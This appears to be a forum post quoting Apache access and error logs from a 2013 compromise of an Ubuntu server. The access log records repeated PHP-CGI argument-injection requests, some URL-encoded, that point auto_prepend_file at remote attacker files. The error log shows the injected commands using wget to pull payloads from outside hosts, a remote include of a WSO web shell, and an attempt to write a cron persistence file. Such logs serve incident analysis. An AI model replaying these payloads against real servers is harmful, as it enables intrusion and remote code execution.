80.82.78.9 - - [22/Nov/2013:19:05:32 +0300] “POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1” 200 1200 “-” "-"
94.102.56.237 - - [22/Nov/2013:19:12:51 +0300] “GET / HTTP/1.0” 200 1805 “-” "-"
94.102.56.237 - - [22/Nov/2013:19:35:42 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 336 “-” "-"
94.102.56.237 - - [22/Nov/2013:19:37:42 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 336 “-” "-"
94.102.56.237 - - [22/Nov/2013:19:39:01 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 336 “-” "-"
94.102.56.237 - - [22/Nov/2013:19:40:50 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 336 “-” "-"
94.102.56.237 - - [22/Nov/2013:19:42:06 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 315 “-” "-"
94.102.56.237 - - [22/Nov/2013:19:43:25 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 315 “-” "-"
94.102.56.237 - - [22/Nov/2013:23:00:36 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 315 “-” "-"
94.102.56.237 - - [22/Nov/2013:23:03:16 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 315 “-” "-"
94.102.56.237 - - [22/Nov/2013:23:16:34 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 315 “-” "-"
94.102.56.237 - - [22/Nov/2013:23:25:13 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 315 “-” "-"
94.102.56.237 - - [22/Nov/2013:23:45:06 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk2.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 305 “-” "-"
94.102.56.237 - - [22/Nov/2013:23:45:36 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk2.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 305 “-” "-"
94.102.56.237 - - [22/Nov/2013:23:47:41 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk2.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 305 “-” "-"
94.102.56.237 - - [22/Nov/2013:23:48:24 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk2.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 305 “-” "-"
24.17.76.222 - - [23/Nov/2013:00:33:53 +0300] “\x80w\x01\x03\x01” 200 1397 “-” "-"
24.17.76.222 - - [23/Nov/2013:00:33:53 +0300] “GET /HNAP1/ HTTP/1.1” 404 503 “http://41.188.27.122/” "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)"
80.86.84.72 - - [23/Nov/2013:03:22:27 +0300] “GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1” 404 489 “-” "ZmEu"
80.86.84.72 - - [23/Nov/2013:03:22:27 +0300] “GET /phpMyAdmin/scripts/setup.php HTTP/1.1” 404 479 “-” "ZmEu"
80.86.84.72 - - [23/Nov/2013:03:22:28 +0300] “GET /phpmyadmin/scripts/setup.php HTTP/1.1” 404 478 “-” "ZmEu"
80.86.84.72 - - [23/Nov/2013:03:22:28 +0300] “GET /pma/scripts/setup.php HTTP/1.1” 404 474 “-” "ZmEu"
80.86.84.72 - - [23/Nov/2013:03:22:29 +0300] “GET /myadmin/scripts/setup.php HTTP/1.1” 404 477 “-” "ZmEu"
80.86.84.72 - - [23/Nov/2013:03:22:29 +0300] “GET /MyAdmin/scripts/setup.php HTTP/1.1” 404 478 “-” "ZmEu"
80.86.84.72 - - [23/Nov/2013:03:22:30 +0300] “GET HTTP/1.1” 400 301 “-” "-"
50.16.70.162 - - [23/Nov/2013:04:01:15 +0300] “HEAD / HTTP/1.1” 200 367 “-” "Cloud mapping experiment. Contact research@pdrlabs.net"
54.205.65.107 - - [23/Nov/2013:05:10:42 +0300] “HEAD / HTTP/1.1” 200 367 “-” "Cloud mapping experiment. Contact research@pdrlabs.net"
210.149.29.182 - - [23/Nov/2013:06:38:41 +0300] “POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 200 216 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
94.102.56.237 - - [23/Nov/2013:08:47:58 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk2.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 305 “-” "-"
50.178.115.102 - - [23/Nov/2013:08:51:47 +0300] “\x80w\x01\x03\x01” 200 1397 “-” "-"
50.178.115.102 - - [23/Nov/2013:08:51:48 +0300] “GET /HNAP1/ HTTP/1.1” 404 503 “http://41.188.27.122/” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008092215 Firefox/3.0.1 Orca/1.1 beta 3”

[/quote]

error.log

[quote][Sun Nov 17 07:48:18 2013] [warn] RSA server certificate CommonName (CN) ubuntu' does NOT match server name!? [Sun Nov 17 07:48:18 2013] [warn] RSA server certificate CommonName (CN)ubuntu’ does NOT match server name!?
[Sun Nov 17 07:48:18 2013] [warn] Init: Name-based SSL virtual hosts only work for clients with TLS server name indication support (RFC 4366)
[Sun Nov 17 07:48:18 2013] [notice] Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k configured – resuming normal operations
[Sun Nov 17 07:48:18 2013] [warn] long lost child came home! (pid 1497)
[Sun Nov 17 07:48:18 2013] [warn] long lost child came home! (pid 1498)
[Sun Nov 17 07:48:18 2013] [warn] long lost child came home! (pid 1499)
[Sun Nov 17 07:48:18 2013] [warn] long lost child came home! (pid 1500)
[Sun Nov 17 07:48:18 2013] [warn] long lost child came home! (pid 1501)
[Mon Nov 18 09:35:22 2013] [error] [client 192.168.11.14] PHP Warning: pg_pconnect(): Unable to connect to PostgreSQL server: FATAL: authentification Ident ?chou?e pour l’utilisateur << gforge >> in /usr/share/gforge/common/include/database-pgsql.php on line 78
[Mon Nov 18 09:47:43 2013] [error] [client 66.84.25.66] perl: no process found
[Mon Nov 18 09:47:43 2013] [error] [client 66.84.25.66] --2013-11-18 09:47:43-- 198.204.233.124/…/unix
[Mon Nov 18 09:47:43 2013] [error] [client 66.84.25.66] Connecting to 198.204.233.124:80…
[Mon Nov 18 09:47:43 2013] [error] [client 66.84.25.66] connected.
[Mon Nov 18 09:47:43 2013] [error] [client 66.84.25.66] HTTP request sent, awaiting response…
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] 200 OK
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] Length:
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] 38669
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] (38K)
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] Saving to: `unix’
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] 0K
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] .
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] .

[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66] 100%
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66] 52.2K
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66] =0.7s
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66] 2013-11-18 09:47:45 (52.2 KB/s) - unix' saved [38669/38669] [Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66] [Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66] Premature end of script headers: php [Mon Nov 18 15:55:17 2013] [error] [client 2.100.158.26] request failed: error reading the headers [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] <b>Security Alert!</b> The PHP CGI cannot be accessed directly. [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] <p>This PHP CGI binary was compiled with force-cgi-redirect enabled. This [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] means that a page will only be served up if the REDIRECT_STATUS CGI variable is [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] set, e.g. via an Apache Action directive.</p> [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] <p>For more information as to <i>why</i> this behaviour exists, see the <a href="http://php.net/security.cgi-bin">manual page for CGI security</a>.</p> [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] <p>For more information about changing this behaviour or re-enabling this webserver, [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] consult the installation file that came with this distribution, or visit [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] <a href="http://php.net/install.windows">the manual page</a>.</p> [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] Premature end of script headers: php [Tue Nov 19 07:45:11 2013] [error] [client 192.168.11.14] PHP Warning: pg_pconnect(): Unable to connect to PostgreSQL server: FATAL: authentification Ident ?chou?e pour l'utilisateur << gforge >> in /usr/share/gforge/common/include/database-pgsql.php on line 78 [Tue Nov 19 16:32:35 2013] [error] [client 192.168.11.14] PHP Warning: pg_pconnect(): Unable to connect to PostgreSQL server: FATAL: authentification Ident ?chou?e pour l'utilisateur << gforge >> in /usr/share/gforge/common/include/database-pgsql.php on line 78 [Tue Nov 19 18:14:57 2013] [error] [client 82.221.105.6] File does not exist: /var/www/robots.txt [Wed Nov 20 08:37:08 2013] [error] [client 192.168.11.14] PHP Warning: pg_pconnect(): Unable to connect to PostgreSQL server: FATAL: authentification Ident ?chou?e pour l'utilisateur << gforge >> in /usr/share/gforge/common/include/database-pgsql.php on line 78 [Thu Nov 21 06:03:13 2013] [error] [client 198.20.69.74] File does not exist: /var/www/robots.txt [Thu Nov 21 08:30:11 2013] [error] [client 192.168.11.14] PHP Warning: pg_pconnect(): Unable to connect to PostgreSQL server: FATAL: authentification Ident ?chou?e pour l'utilisateur << gforge >> in /usr/share/gforge/common/include/database-pgsql.php on line 78 [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] <b>Security Alert!</b> The PHP CGI cannot be accessed directly. [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] <p>This PHP CGI binary was compiled with force-cgi-redirect enabled. This [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] means that a page will only be served up if the REDIRECT_STATUS CGI variable is [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] set, e.g. via an Apache Action directive.</p> [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] <p>For more information as to <i>why</i> this behaviour exists, see the <a href="http://php.net/security.cgi-bin">manual page for CGI security</a>.</p> [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] <p>For more information about changing this behaviour or re-enabling this webserver, [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] consult the installation file that came with this distribution, or visit [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] <a href="http://php.net/install.windows">the manual page</a>.</p> [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] Premature end of script headers: php [Thu Nov 21 17:13:36 2013] [error] [client 192.168.11.14] PHP Warning: pg_pconnect(): Unable to connect to PostgreSQL server: FATAL: authentification Ident ?chou?e pour l'utilisateur << gforge >> in /usr/share/gforge/common/include/database-pgsql.php on line 78 [Thu Nov 21 17:33:52 2013] [error] [client 82.221.102.181] PHP Warning: Unknown: failed to open stream: HTTP request failed! HTTP/1.0 522 Unknown\r [Thu Nov 21 17:33:52 2013] [error] [client 82.221.102.181] in Unknown on line 0 [Thu Nov 21 17:33:52 2013] [error] [client 82.221.102.181] PHP Fatal error: Unknown: Failed opening required 'http://files.xakep.biz/shells/PHP/wso.txt' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0 [Thu Nov 21 17:35:02 2013] [error] [client 82.221.102.181] PHP Warning: Unknown: failed to open stream: HTTP request failed! HTTP/1.0 522 Unknown\r [Thu Nov 21 17:35:02 2013] [error] [client 82.221.102.181] in Unknown on line 0 [Thu Nov 21 17:35:02 2013] [error] [client 82.221.102.181] PHP Fatal error: Unknown: Failed opening required 'http://files.xakep.biz/shells/PHP/wso.txt' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0 [Thu Nov 21 17:39:17 2013] [error] [client 82.221.102.181] PHP Notice: Undefined variable: argc in [files.xakep.biz/shells/PHP/wso.txt](http://files.xakep.biz/shells/PHP/wso.txt) on line 7 [Thu Nov 21 17:41:38 2013] [error] [client 82.221.102.181] PHP Warning: Unknown: failed to open stream: HTTP request failed! HTTP/1.0 522 Unknown\r [Thu Nov 21 17:41:38 2013] [error] [client 82.221.102.181] in Unknown on line 0 [Thu Nov 21 17:41:38 2013] [error] [client 82.221.102.181] PHP Fatal error: Unknown: Failed opening required 'http://files.xakep.biz/shells/PHP/wso.txt' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0 [Thu Nov 21 17:46:15 2013] [error] [client 82.221.102.181] PHP Warning: Unknown: failed to open stream: HTTP request failed! HTTP/1.0 522 Unknown\r [Thu Nov 21 17:46:15 2013] [error] [client 82.221.102.181] in Unknown on line 0 [Thu Nov 21 17:46:15 2013] [error] [client 82.221.102.181] PHP Fatal error: Unknown: Failed opening required 'http://files.xakep.biz/shells/PHP/wso.txt' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0 [Thu Nov 21 17:48:04 2013] [error] [client 82.221.102.181] PHP Warning: Unknown: failed to open stream: HTTP request failed! HTTP/1.0 522 Unknown\r [Thu Nov 21 17:48:04 2013] [error] [client 82.221.102.181] in Unknown on line 0 [Thu Nov 21 17:48:04 2013] [error] [client 82.221.102.181] PHP Fatal error: Unknown: Failed opening required 'http://files.xakep.biz/shells/PHP/wso.txt' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0 [Thu Nov 21 17:49:11 2013] [error] [client 82.221.102.181] PHP Warning: Unknown: failed to open stream: HTTP request failed! HTTP/1.0 520 Unknown\r [Thu Nov 21 17:49:11 2013] [error] [client 82.221.102.181] in Unknown on line 0 [Thu Nov 21 17:49:11 2013] [error] [client 82.221.102.181] PHP Fatal error: Unknown: Failed opening required 'http://files.xakep.biz/shells/PHP/wso.txt' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0 [Thu Nov 21 18:31:33 2013] [error] [client 82.221.102.181] PHP Notice: Undefined variable: argc in [files.xakep.biz/shells/PHP/wso.txt](http://files.xakep.biz/shells/PHP/wso.txt) on line 7 [Fri Nov 22 00:15:52 2013] [error] [client 94.102.56.237] File does not exist: /var/www/cgi-php [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] --2013-11-22 00:44:26-- [74.208.228.113/lol](http://74.208.228.113/lol) [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] Connecting to 74.208.228.113:80... [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] connected. [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] HTTP request sent, awaiting response... [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] --2013-11-22 00:44:26-- [europay24.info/c](http://europay24.info/c) [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] Resolving europay24.info... [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] 200 OK [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] Length: 6907 (6.7K) [text/plain] [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] Saving to:lol’
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] 0K .
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] .
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] .
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] …
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] . 100% 1.31M=0.005s
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] 2013-11-22 00:44:26 (1.31 MB/s) - lol' saved [6907/6907] [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] sh: curl: not found [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] sh: fetch: not found [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] 85.17.180.61 [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] Connecting to europay24.info|85.17.180.61|:80... [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] connected. [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] HTTP request sent, awaiting response... [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] 200 OK [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] Length: 263 [text/plain] [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] Saving to:c’
[Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] 0K 100%
[Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] 43.7M=0s
[Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] 2013-11-22 00:44:27 (43.7 MB/s) - c' saved [263/263] [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] --2013-11-22 00:44:27-- [europay24.info/a](http://europay24.info/a) [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] Resolving europay24.info... [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] 85.17.180.61 [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] Connecting to europay24.info|85.17.180.61|:80... [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] connected. [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] HTTP request sent, awaiting response... [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] 200 OK [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] Length: 716 [text/plain] [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] Saving to:a’
[Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] 0K 100% 128M=0s
[Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] 2013-11-22 00:44:28 (128 MB/s) - a' saved [716/716] [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] --2013-11-22 00:44:28-- [europay24.info/update](http://europay24.info/update) [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] Resolving europay24.info... 85.17.180.61 [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] Connecting to europay24.info|85.17.180.61|:80... connected. [Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] HTTP request sent, awaiting response... 200 OK [Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] Length: 215 [text/plain] [Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] Saving to:update’
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] 0K 100% 39.2M=0s
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] 2013-11-22 00:44:29 (39.2 MB/s) - update' saved [215/215] [Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] cp: cannot create regular file/etc/cron.hourly/update’: Permission denied
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on CIRRICULUM VITAE.docx\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on keyring-rWp2Uc\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on orbit-andry\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on orbit-gdm\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on orbit-root\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on pulse-PKdhtXMmr18n\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on pulse-uZEcfmJ73JvE\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on ssh-NQaeNL1573\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on virtual-andry.NAYr4U\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] --2013-11-22 00:44:29-- europay24.info/clamav
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] Resolving europay24.info… 85.17.180.61
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] Connecting to europay24.info|85.17.180.61|:80… connected.
[Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] HTTP request sent, awaiting response… 200 OK
[Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] Length: 379680 (371K) [text/plain]
[Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] Saving to: clamav' [Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] 0K .......... .......... .......... .......... .......... 13% 337K 1s [Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] 50K .......... .......... .......... .......... .......... 26% 1012K 1s [Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] 100K .......... .......... .......... .......... .......... 40% 845K 0s [Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] 150K .......... .......... .......... .......... .......... 53% 738K 0s [Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] 200K .......... .......... .......... .......... .......... 67% 878K 0s [Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] 250K .......... .......... .......... .......... .......... 80% 644K 0s [Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] 300K .......... .......... .......... .......... .......... 94% 122K 0s [Fri Nov 22 00:44:31 